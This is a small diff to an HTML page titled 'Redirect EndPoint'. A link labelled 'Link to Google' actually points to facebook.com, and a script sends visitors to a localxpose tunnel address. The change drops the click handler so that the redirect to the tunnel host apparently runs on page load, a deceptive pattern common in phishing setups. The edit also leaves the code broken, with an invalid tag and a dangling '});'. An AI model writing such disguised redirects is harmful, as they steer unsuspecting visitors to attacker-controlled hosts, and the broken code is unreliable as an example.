--- a/index.html
+++ b/index.html
@@ -6,11 +6,8 @@
     <title>Redirect EndPoint</title>
 </head>
 <body>
-    <a href="https://facebook.com" id="redirectLink">Link to Google</a></center>
-
+    <href="https://facebook.com" id="redirectLink"/>
     <script>
-        document.getElementById("redirectLink").addEventListener("click", function(event) {
-            event.preventDefault();
             window.location.href = "https://ygvvjgywoz.loclx.io"; 
         });
     </script>
